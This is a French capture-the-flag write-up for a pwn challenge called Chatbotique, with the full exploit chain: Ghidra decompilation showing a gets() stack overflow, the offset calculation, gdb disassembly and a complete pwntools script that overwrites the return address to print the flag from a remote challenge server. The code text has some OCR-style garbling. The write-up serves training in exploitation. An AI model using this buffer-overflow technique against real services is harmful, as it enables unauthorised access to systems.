Chatbotique (MEDIUM)

Auteur(s):

Hokanosekai

Catégorie:

Pwn

Description:

Un étudiant a mis au point un chatbot pour concurrencer ChatGPT, or il a oublié de sécuriser son application. Trouve le flag!

chatbotique

```
nc 161.35.21.37 40013
```

Flag : UHOCTF{Fake_flag}

Solution

On peut commencer par lancer la commande file sur le binaire :

```
hoka@hoka ~/c/U/U/P/Chatbotique (main)> file chatbotique chatbotique: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=3c300cbb9f4046d259e38576a26c0acdd0100ce9, for GNU/Linux 3.2.0, not stripped
```

PROF

Le binaire est un éxécutable 64 bits, dynamiquement linké, non strippé.

Ensuite, on peut lancer le binaire :

```
hoka@hoka ~/c/U/U/P/Chatbotique (main)> ./chatbotique
Bienvenue sur Chatbotique !
Comment puis-je vous aider ?
test
Je suis encore en cours d'apprentissage, je ne comprends pas votre
demande.
```

Lors de l'éxécution, le binaire nous demande une entrée, et nous renvoie une réponse.

Nous allons maintenant regarder le code du binaire avec Ghidra.

```
/* WARNING: Removing unreachable block (ram,0x00401310) */
undefined8 main(void)
{
  int iVar1;
  char local_108 [256];
  setbuf(stdout,(char *)0x0);
  puts("Bienvenue sur Chatbotique !");
  puts("Comment puis-je vous aider ?");
  gets(local_108);
  iVar1 = strcmp(local 108, "Je voudrais le flag");
  if (iVar1 == 0) {
    puts("Je ne suis pas sur d\'avoir compris votre demande.");
  }
  else {
    iVar1 = strcmp(local_108,&DAT_00402090);
    if (iVar1 == 0) {
     puts(&DAT 004020b8);
    }
    else {
      iVar1 = strcmp(local_108,&DAT 00402108);
      if (iVar1 == 0) {
        puts(&DAT_00402148);
      }
      else {
        iVar1 = strcmp(local 108,&DAT 004021a0);
        if (iVar1 == 0) {
          puts("Bien sur, il vous suffit de me donner votre mot de
passe.");
        else {
          iVar1 = strcmp(local 108, "Donne moi le flag stp");
          if (iVar1 == 0) {
            puts("L\'impolitesse ne paie pas.");
          }
          else {
            iVar1 = strcmp(local 108,&DAT 00402238);
            if (iVar1 == 0) {
              puts(&DAT_00402278);
            }
            else {
              iVar1 = strcmp(local_108, "Pain au chocolat ou Chocolatine
?");
              if (iVar1 != 0) {
                puts("Je suis encore en cours d\'apprentissage, je ne
comprends pas votre demande.")
                    /* WARNING: Subroutine does not return */
```

```
exit(1);
}
puts("Je ne sais pas, je suis un robot.");
sleep(0x14);
puts(&DAT_00402368);
}
}
}
}
return 0;
}
```

On peut voir que le binaire utilise la fonction gets pour récupérer notre entrée, ce qui est une faille de sécurité connue. En effet, cette fonction ne vérifie pas la taille de l'entrée, ce qui peut mener à un buffer overflow.

Nous avons donc notre point d'entrée pour exploiter le binaire, mais nous avons un problème, si aucune des comparaisons n'est validée, le programme se termine, donc juste réécrire rip n'est pas suffisant.

Nous allons donc pouvoir créer un payload commencant par Je voudrais le flag, et suivi d'un bite null $\times 00$ pour terminer la chaine de caractère, puis nous allons pouvoir écrire l'adresse de la fonction puts pour qu'elle soit appelée après la comparaison.

Nous devons maintenant trouver l'offset pour écrire l'adresse de la fonction puts dans le registre rip.

Pour trouver cet offset, il nous suffit de regarder le code décompiler du binaire.

```
char local_108 [256];
```

Cette variable est la première variable initialisée, et par conséquent, la plus proche du registre rbp, qui lui même est devant le registre rip. Notre offset est donc de 256 + 8 = 264. Cela veut dire que le 265ème caractère de notre payload sera écrit dans le registre rip.

Afin de savoir quelle adresse écrire dans le registre rip, nous allons utiliser l'outil gdb.

```
(qdb) disass main
Dump of assembler code for function main:
  0x0000000000401182 <+0>:
                                push
                                       %rbp
  0 \times 00000000000401183 <+1>:
                                mov
                                       %rsp,%rbp
  0x0000000000401186 <+4>:
                                       $0x110,%rsp
                                sub
  0x000000000040118d <+11>:
                                mov
                                       0x2ecc(%rip),%rax
0x404060 <stdout@GLIBC 2.2.5>
  0×0000000000401194 <+18>:
                                       $0x0,%esi
                                mov
```

jne

```
0x402398
  0x000000000040133f <+445>:
                                call
                                       0x401030 <puts@plt>
  0x00000000000401344 <+450>:
                                mov
                                       $0x1,%edi
  0x0000000000401349 <+455>:
                                call
                                       0x401080 < exit@plt>
  0x000000000040134e <+460>:
                                       $0x0,%eax
                                mov
  0x0000000000401353 <+465>:
                                leave
  0x0000000000401354 <+466>:
                                ret
End of assembler dump.
```

Grâce à ce dump, nous pouvons trouver à quel puts il faut sauter pour avoir le flag.(Celui qui est juste avant le system)

```
0x000000000401317 <+405>: call 0x401030 <puts@plt>
```

Nous pouvons maintenant tester en utilisant la libraire pwntools:

```
from pwn import *
exe = ELF("./chatbotique", checksec=False)
context.binary = exe
def conn():
    print(args)
    if args.LOCAL:
        r = process([exe.path])
        if args.DEBUG:
            gdb.attach(r)
    else:
        r = remote("161.35.21.37", 40013)
    return r
def main():
    r = conn()
    r.recv()
    condition = b"Je voudrais le flag\times00"
    junk = b"A" * (0x100 - len(condition))
    rbp = b"B" * 0x8
    rip = p64(0x00401317)
    payload = condition + junk + rbp + rip
    print(payload)
    r.sendline(payload)
```

```
print(r.recvall().decode().split("\n")[2])

if __name__ == "__main__":
    main()
```

Lorsque nous lançons le script en local, nous obtenons le flag:

Maintenant, nous pouvons lancer le script en remote:

Il faut penser à ajouter un autre <u>recv</u> pour recevoir la seconde ligne affichée lors de la connexion.

Flag: UH0CTF{Ch4tGPT_15_u53l355_f0r_buff3r_0v3rfl0w}

Hosting

```
sudo docker build -t chatbotique .
sudo docker network create -d bridge chatbotique
```



sudo docker run -p 40013:40013 --detach --name chatbotique --network chatbotique chatbotique:latest

The command to stop the challenge (since CTRL+C won't work) is:

sudo docker stop chatbotique